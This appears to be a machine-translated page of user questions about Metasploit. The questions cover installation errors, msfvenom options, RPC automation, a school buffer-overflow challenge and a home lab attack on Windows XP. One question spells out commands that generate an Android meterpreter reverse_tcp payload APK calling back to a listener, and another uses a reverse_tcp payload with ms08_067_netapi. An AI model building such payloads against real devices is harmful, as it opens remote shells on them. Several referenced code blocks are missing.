问题标签 [metasploit]

我正在尝试在 Raspberry Pi 模型 B+ 上安装 Metasploit

因为我是 Metasploit 和 Gems 环境的新手，所以我一直在关注此链接中的详细信息在Raspberry 上安装 Metasploit ，在我进行捆绑之前一切正常

所以它说我应该安装 metasploit-concern v 1.0.0

然后我尝试使用以下两个代码gem install metasploit-concern -v '1.0.0'和gem install metasploit-concern

所以然后我尝试安装 Ruby 2.1 和 ruby

root@raspberrypi:~/msf3# gem install Ruby -v '2.1' ERROR: Could not find a valid gem 'Ruby' (= 2.1) in any repository ERROR: Possible alternatives: ruby

root@raspberrypi:~/msf3# gem install ruby ERROR: Could not find a valid gem 'ruby' (>= 0) in any repository ERROR: Possible alternatives: ruby

现在你可以看到它是一个漏洞，我被卡住了

ps * 也已经安装了 ruby​​-dev * 每次都尝试在 ruby​​ 和 ruby​​ 之间切换*在捆绑时它说（使用）而不是（安装），因为我尝试重新运行捆绑以查看它是否可以工作）* 我也尝试采购gem sources -a https://rubygems.org. 和gem sources -a https://rubygems.org

我试图提供所有可能的信息，也许它有用，也许它不是......以防万一

我将非常感谢您的帮助在此先感谢

干杯班达尔

我正在尝试在 android 设备（GT - 19300 和 SGS Tab S 10.5）上安装被黑的 apk。我的问题是，它既没有在我的手机上也没有在我的标签上安装该 apk。它一直说，无法安装该应用程序...手机正在运行 Android 4.3（已root！），Tab 正在运行 Android 5.0.2。我使用以下命令在 metasploit pro 控制台（Windows）上创建了 apk：

使用 android/meterpreter/reverse_tcp

设置 LHOST 192.168.2.107

设置 LPORT 443

生成 -t raw -f //路径

感谢帮助

操作系统： Kali Linux 2.0 在运行 i3 的 Ubuntu MATE 中作为虚拟机 (VirtualBox) 运行。

这是一个相当简单的问题：现在 -o 标志不再在 msfvenom 中提供有效负载选项，是什么取代了它？我查看了 -h 输出并在各个地方尝试了 --payload-options ，但没有任何效果。我确信我遗漏了一些简单的东西，但没有什么能指出我正确的方向，因为所有教程和信息仍然使用 -o 标志。

这是帮助输出的相关部分：

我正在尝试解决我的学校提供​​的缓冲区溢出挑战。服务器上有 ac 程序作为服务暴露在某个端口上，例如 2323

他们还提供了bindshell 端口，例如2525，他们提到他们依赖于guestport 4444 上的TCP-bindshell。即2525 被重定向到我的虚拟机上的端口4444。

我正在使用 metasploit 编写一个漏洞利用程序，但我并不真正理解这里提供给我的 bindshell 的概念。

我尝试了从我的机器到 2525 上的服务器 IP 的 netcat，它说：

如您所见，它打开但不连续收听。

在运行漏洞利用时，我使用 RPORT 作为 2323，但我不明白我应该在哪里提到 bindshell 端口 2525

有谁知道我应该如何进行。如何直接连接到端口 2525 上的 shell，这是不允许的。

我试图将一个变量传递给另一个正在启动的程序。我遇到了变量工作的问题

这是代码它一直有效，直到通过 RHOST，metasploit 将其作为 %RHOST

我需要在设置 RHOSTS 之后直接传递 RHOST 变量。请帮忙 ：）

我是一名网络安全学生，我不是破解者、scriptkiddy 或类似的东西，我正在研究 python Meterpreter 的侦听器，我找到了一个普通的 tcp 反向处理程序，它正在使用 cmd reverse tpc (metasploit)，但是它不适用于meterpreter reverse tpc（metasploit）......有人知道为什么吗？谢谢。

正如我在问题标题中所说，如何在 Kali 上的 Metasploit 中读取或访问漏洞利用的源代码？

注意：请不要说“你在 ~/.msf4 下查看了吗”。因为除了空文件夹之外没有任何东西。

我正在使用以下代码来自动化 Metasploit：

但它不起作用，我收到错误：

client.call('console.write',[console_id,commands]) NameError: name 'client' is not defined

问题是什么？有没有其他可以以类似方式工作的脚本？

我有一个问题，我想将 Metasploit 框架作为服务运行，但如果使用“msfrpcd”工具，它无法连接数据库。如果我使用 msfconsole 并且“加载 msgrpc”就可以了。那么当我使用“msfrpcd”工具时，你能帮我连接到数据库吗？感谢您的支持。

我有一个小型“实验室”试图在家中进行渗透测试，我有我的主操作系统，并且在一个运行 Windows XP SP3 (ENG) 的 VM 上。我使用 ms08_067_netapi 和 reverse_tcp 作为有效载荷。当我使用exploit命令时，这就是我得到的。

我从中可以理解的是，该漏洞利用有效，但有效负载无法运行。我做的第一件事是将端口从 4444 更改为 80，以防万一防火墙阻止了有效负载。我得到了同样的回复，尝试将 80 和 443 作为 LPORT。

你对我还能做什么有什么建议吗？